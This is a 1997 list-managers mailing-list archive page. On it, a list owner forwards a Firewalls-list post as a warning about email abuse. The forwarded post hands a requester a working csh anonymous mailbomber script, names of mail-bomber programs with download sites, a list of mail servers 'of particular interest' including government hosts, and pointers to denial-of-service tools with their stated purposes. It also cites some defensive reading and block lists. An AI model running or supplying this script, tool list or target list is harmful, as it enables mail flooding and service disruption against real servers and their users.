Great Circle Associates List-Managers
(April 1997) 		 
Indexed By Date: [Previous] [Next] Indexed By Thread: [Previous] [Next]
Subject: What we're up against...
From: Brent Chapman <Brent @ GreatCircle . COM>
Date: Mon, 21 Apr 1997 10:54:04 -0800
To: list-managers @ GreatCircle . COM 
This was posted to Firewalls; I figured the folks here might be interested
in it, if for no other reason than to get some idea of what we're up
against...


-Brent

--- begin forwarded text


Date: Sat, 19 Apr 1997 18:34:27 -0700
From: Osiris <osiris@pacificnet.net>
Organization: Abode of the Dead
MIME-Version: 1.0
To: Warpy <warpy@null.net>
CC: Ashram Beachoo <swamie@usa.net>, firewalls@GreatCircle.COM
Subject: Re: Warpy the wimp and Mail Bombing (LONG)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Warpy wrote:
>
> Ummm, errr, ok. If I was out of line I apologise about my post. However
> from the way he wrote about email bombing it looked like he was interested
> in using it rather than preventing it. Had he written asking I'm am
> looking at how to PREVENT such email bombers as UpYours 4.0, then I
> wouldn't have cared a bit.
>
> And Wimpy? Are we still stuck in kindergarten here?
>

Perhaps he wanted to understand how such programs work, which ones were
available and whom they were written by. Since no one actually answered
the question (as off topic as it may be), perhaps I should. True, it's
off-topic, but it is better to send someone away with what they asked
for than have them return only to ask it again. The dope, therefore, is
as follows:

1. Entering the following strings into altavista.digital.com will get
you a wide range of such "programs":

upyours.exe (Windows/Windows95/WindowsNT)
upyours2.zip (Windows/Windows95/WindowsNT)
upyours3.zip (Windows/Windows95/WindowsNT)
kaboom!3.zip (Windows/Windows95/WindowsNT)
kaboom3.exe (Windows/Windows95/WindowsNT)
alanch10.zip (Windows/Windows95/WindowsNT)
avalanche20.zip (Windows/Windows95/WindowsNT)
avalanche.exe (Windows/Windows95/WindowsNT)
unabomb.zip (Windows/Windows95/WindowsNT)
unabomb.exe (Windows/Windows95/WindowsNT)
xmailb1.zip (Windows/Windows95/WindowsNT)
xmailb1.exe (Windows/Windows95/WindowsNT)
homicide.zip (Windows/Windows95/WindowsNT)
homicide.exe (Windows/Windows95/WindowsNT)
bombtrack.bin (MacOS)
flamethrower10b.sit.bin (MacOS)

Nearly all of these are available for download and examination at the
following location:

http://www.ilf.net/wilter/ehack/email/email/mail.html

..Also, there is a page that rates each of these "bombers" according to
the page owner's unique specifications. It is a quick way to learn what
each one does. That page is located here:

http://main.succeed.net/~bbuster/hacking/email/

..Mail servers of particular interest are these:


        centerof.thesphere.com
        lonepeak.vii.com
        acad.bryant.edu
        miami.linkstar.com
        wheel.dcn.davis.ca.us
        palette.wcupa.edu
        wpgate.hqpacaf.af.mil
        www.geocities.com
        www.whitehouse.gov
        www.internic.net
        www.twocrows.com
        www.pbs.org
        www.ohio.net
        www.pacbell.net
        www.nacho.com
        www.netforward.com
        www.iowa.net
        www.idaho.net
        www.montana.net
        www.vicon.net
        www.free.net
        www.grotesque.com
        www.infodomain.com
================================================================================
=====

2. No special programming knowledge is required to create on on the UNIX
platform.

   For example:

#!/bin/csh
# Anonymous Mailbomber
# do chmod u+rwx <filename> where filename is the name of the file that
# you saved it as.
#*** WARNING - THIS WILL CREATE AND DELETE A TEMP FILE CALLED
# "teltemp"
# IN THE DIRECTORY IT IS RUN FROM ****
clear
echo -n "What is the name or address of the smtp server ?"
set server = $<
#echo open $server 25 > teltemp
echo quote helo somewhere.com >> teltemp
#The entry for the following should be a single name (goober),
#not goober@internet.address.
echo -n "Who will this be from (e.g. somebody) ?"
set from = $<
echo quote mail from: $from >> teltemp
echo -n "Who is the lucky recipient (e.g. someone@somewhere) ? "
set name = $<
echo quote rcpt to: $name >> teltemp
echo quote data >> teltemp
echo quote . >> teltemp
echo quote quit >> teltemp
echo quit >> teltemp
echo -n "How many times should it be sent ?"
set amount = $<
set loop_count = 1
while ($loop_count <= $amount)
	echo "Done $loop_count"
	ftp -n $server 25 < teltemp
	@ loop_count++
end
rm ./teltemp
echo $amount e-mails complete to $name from $from@$server

**** This was reportedly authored by a fellow called "CyBerGoat"

(PERL is actualy quite suited to this type of task. It is also suited
for coding tools to defeat these types of irritating attacks.)

Special note: new types of email bombing utilities have been designed,
particularly with JavaScript. Here is one such utility:

      http://main.succeed.net/~bbuster/hacking/bomb.html

Here, you will find another:

      http://ally.ios.com/~cdcjdc19/bomb.htm

These are valuable because, unlike the Doze and MacOS ones, the source
is easily examined.
================================================================================
=====

3. There are several documents that discuss the subject. Here are some
that treat both bombing and forging:

**E-Mail Bombing and Spamming**
What is E-Mail Spamming?
What is E-Mail Bombing?
What can be done about it?
Last Date of Apparent Modification:  November 25, 1996
Author: Byron Palmer
Location: http://mwir.lanl.gov:8080/E-Mail_Spamming.html and also:

http://wsspinfo.cern.ch/sec/cert/tech_tips/email_bombing_spamming

**Spoofed/Forged Email**
CERT/Carnegie Mellon University
Last Date of Apparent Modification: No Date Given
Location: ftp://info.cert.org/pub/tech_tips/email_spoofing

**E-Mail Bombs and Journalists**
Author: Steve Outing
Last Date of Apparent Modification: Friday, January 10, 1997
Location: http://www.mediainfo.com/ephome/news/newshtm/stop/st011097.htm

**I'VE BEEN SPAMMED!**
Source: Time Magazine
Volume 147, No. 12
Author: PHILIP ELMER-DEWITT
Date: March 18, 1996
Location:
http://pathfinder.com/@@0vsMrwcAt6xCLcGD/time/magazine/domestic/1996/960318/tech
nology.html

**Up Yours v2.0 FAQ**
Authors: GlobalKos
Last Date of Apparent Modification: No Date Given
Location: http://main.succeed.net/~bbuster/hacking/faq.txt

***E-Mail Bombing*** (Somewhat lame.)
WRAL News
Capitol Broadcasting Company
Location:
http://www.wral-tv.com/news/wral/datacenter/1997/0224-email-bombing/



================================================================================
=====

Overview:

Email bombing and spamming suck the big, putrid weeny. Anyone who does
it is an asshole. However, there is no shortage of such persons. Many
groups maintain lists of such people. Here is one generated by the folks
at AOL:

       http://www.idot.aol.com/preferredmail/

Many providers have also been identified as "Rogue" sites; sites that
allow or encourage spamming (and do not reprimand their users for
bombings. Here is a site that idenitifies those providers:

      http://spam.abuse.net/spam//rogues.html

And, of course, for a historical perspective (though more of USENET
spams), you can always visit the Blacklist of Internet Advertisers,
which is located here:

   http://math-www.uni-paderborn.de/~axel/BL/blacklist.html

Some more famous cases discussed there include:

L. Canter, M. Siegel (Canter and Siegel, Immigration Lawyers)
Jess Guim, Advanz Home Office Companion
TMI
Kevin Jay Lipsitz a.k.a. Krazy Kevin, Magazine Club Inquiry Center
Kim Kerns, Applied Information Technologies, Inc.
Cybergear

One extremely interesting document is Rahul Dhesi's Block list, which
contains a list of rules for filtering this crap. It is located here:

http://www.rahul.net/dhesi/nojunk.txt

Contained within that document is a series of patterns (the
implementation is PERL 5) that have been identified as being associated
with junk mail, bombing or whatever.

================================================================================
======

Special Tools Related to Bombing and/or Denial of Service:

**Tool: The Livingston Crasher**
Purpose: Crash any PortMaster
Location:
ftp://ftp.visi.com/users/sluggo/generic/Livingston%20Portmaster%20Exploit%20(Cra
sher).txt
Requirements: C Compiler; UNIX


Tool: win95ping.c (Ping of Death for UNIX)
Purpose: Blow a Doze box off the Net
Location: http://www.sophist.demon.co.uk/ping/pingprogram.html
Source: http://www.sophist.demon.co.uk/ping/ping.c
Requirements: C compiler, UNIX

Tool: syn_flood
Purpose: Flood a target with half open connections, overflowing the
queue
Location: http://jya.com/flood.txt
Source: http://jya.com/flood.txt
Requirements: C compiler, UNIX
(Author: Jason Fairlane)

The original question has now been answered.

--- end forwarded text



--
Brent Chapman			Internet/intranet training and consulting,
Brent@GreatCircle.COM		specializing in network design and security.
Great Circle Associates,Inc.	Visit us at http://www.greatcircle.com/
Indexed By Date Previous: Re: The chutzpah award
From: "Henry W. Miller" <henrym@sacto.mp.usbr.gov>
Next: How many subscribers...
From: "Eric J. Hansen" <eric@worldmachine.com>
Indexed By Thread Previous: Re: IGNORE (SORRY): Probably prelude to a spam: getting on "oknames" list
From: Jason L Tibbitts III <tibbs@hpc.uh.edu>
Next: How many subscribers...
From: "Eric J. Hansen" <eric@worldmachine.com>
Google
 
Search Internet Search www.greatcircle.com